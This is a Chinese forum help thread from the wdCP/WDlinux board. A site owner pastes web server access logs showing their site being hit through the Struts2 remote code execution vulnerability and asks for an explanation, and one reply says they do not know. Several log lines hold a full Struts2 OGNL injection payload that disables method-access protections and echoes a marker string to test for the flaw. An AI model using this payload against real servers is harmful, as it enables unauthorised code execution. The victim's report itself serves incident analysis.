注册
登录
关注:
官网首页
阿里云8折
论坛
wdCDN系统
智能DNS软件
搜索
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
WDlinux官方论坛
»
wdCP V2|linux下免费的服务器/虚拟主机管理系统
» 我的站被struts2远程代码执行漏洞简要回顾
无标题文档
wdCP系统
(
介绍
,
功能特性
,
运行环境
,
安装说明
,
演示
,
常见问题
,
使用教程
)
wdCDN系统
(
介绍
,
功能特性
,
运行环境
,
安装说明
,
演示
,
常见问题
,
使用手册
)
wdOS系统
(
介绍
,
功能特性
,
运行环境
,
安装说明
,
演示
,
常见问题
,
使用教程
)
wdDNS系统
(
介绍
,
功能特性
,
运行环境
,
安装说明
,
演示
,
常见问题
,
使用手册
)
注册 发贴 提问 回复-必看必看
wddns免费智能 DNS
开通
本地或虚拟机使 用wdcp
一键包在mysql编 译时"卡住"
AI导航网AI应用网站大全
wdcp官方技术支持/服务
阿里云8折优惠券
无敌云
腾讯云优惠中,现注册更有260代金额券赠送
返回列表
发帖
flymeteor
发短消息
加为好友
flymeteor
当前离线
UID
17241
帖子
33
精华
0
积分
112
阅读权限
20
在线时间
80 小时
注册时间
2013-3-7
最后登录
2019-5-8
注册会员
1
#
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2014-9-24 10:00
|
只看该作者
提问三步曲:
提问先看教程/FAQ索引(
wdcp
,
wdcp_v3
,
一键包
)及搜索,会让你更快解决问题
1 提供详细,如系统版本,wdcp版本,软件版本等及错误的详细信息,贴上论坛或截图发论坛
2 做过哪些操作或改动设置等
温馨提示:信息不详,很可能会没人理你!论坛有教程说明的,也可能没人理!因为,你懂的
[求助]
我的站被struts2远程代码执行漏洞简要回顾
我的站被这个搞了,截取一段日志,不是很懂,老大来看看,是
当前版本: wdcp_v2.5.10(20140213) 最新
wdcp_v2.5.10(20140213)
更新日志
[tr][/tr]
220.181.165.11 - - [23/Sep/2014:08:00:37 +0800] "GET /news/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\
u003d@org.apache.struts2.ServletActionContext
@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 18573
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_mishouhuan/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\
u003d@org.apache.struts2.ServletActionContext
@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9085
220.181.165.132 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_shengdian/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\
u003d@org.apache.struts2.ServletActionContext
@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9094
220.181.165.134 - - [23/Sep/2014:08:00:38 +0800] "POST /news/ HTTP/1.1" 200 18573
220.181.165.4 - - [23/Sep/2014:08:00:38 +0800] "GET /news/t_ram/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\
u003d@org.apache.struts2.ServletActionContext
@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 7861
222.85.129.139 - - [23/Sep/2014:08:00:38 +0800] "GET /shuaji/77925.html HTTP/1.1" 200 5816
223.104.13.16 - - [23/Sep/2014:08:00:36 +0800] "GET /uploads/image/20130916/20130916074137_94932.jpg HTTP/1.1" 200 53333
220.181.165.11 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_mishouhuan/ HTTP/1.1" 200 9085
220.181.165.135 - - [23/Sep/2014:08:00:38 +0800] "GET /new/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\
u003d@org.apache.struts2.ServletActionContext
@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 301 841
220.181.165.9 - - [23/Sep/2014:08:00:38 +0800] "GET /softs/bixu/?struts&(a)(('\\u0023_memberAccess.allowStaticMethodAccess\\u003dtrue')(z))&(b)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003dfalse')(z))&(c)(('\\u0023_memberAccess.excludeProperties\\u003d{}')(z))&(d)(('\\u0023a_str\\u003d\\'814F60BD-F6DF-4227-\\'')(z))&(e)(('\\u0023b_str\\u003d\\'86F5-8D9FBF26A2EB\\'')(z))&(n)(('\\u0023a_resp\\
u003d@org.apache.struts2.ServletActionContext
@getResponse()')(z))&(o)(('\\u0023a_resp.getWriter().println([url=file://\\u0023a_str\\u002B\\u0023b_str)]\\u0023a_str\\u002B\\u0023b_str)')(z))&(p)(('\\u0023a_resp.getWriter().flush()')(z))&(q)(('\\u0023a_resp.getWriter().close()')(z[/url])) HTTP/1.1" 200 9080
220.181.165.8 - - [23/Sep/2014:08:00:38 +0800] "POST /news/t_ram/ HTTP/1.1" 200 7861
218.81.235.186 - - [23/Sep/2014:08:00:38 +0800] "GET /js/grey.png HTTP/1.1" 200 3410
收藏
分享
AI导航网,AI网站大全,AI工具大全,AI软件大全,AI工具集合,AI编程,AI绘画,AI写作,AI视频生成,AI对话聊天等,尽在aiaiV.cn
yangjiangh
发短消息
加为好友
yangjiangh
当前离线
UID
33046
帖子
6
精华
0
积分
25
阅读权限
10
在线时间
10 小时
注册时间
2014-9-18
最后登录
2018-7-8
新手上路
2
#
发表于 2014-9-24 18:44
|
只看该作者
我也不清楚 不知道有没有交流论坛呢?
piis.cn
TOP
返回列表
我的Linux|wdlinux
ai|大模型|大数据
开源精选
wdCP V3|Linux服务器/云主机/虚拟主机管理系统
wddns|智能DNS系统|免费智能DNS解析
lamp|lnmp|lnamp|一键安装包
wdCP V2|linux下免费的服务器/虚拟主机管理系统
wdcdn系统|CDN缓存加速管理系统
wdOS|CentOS精简版|CentOS定制版
区块链技术|智能合约|区块链开发
wdlinux学堂|wdOS知识库|linux知识库|教程|文档
站务管理
站务管理
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]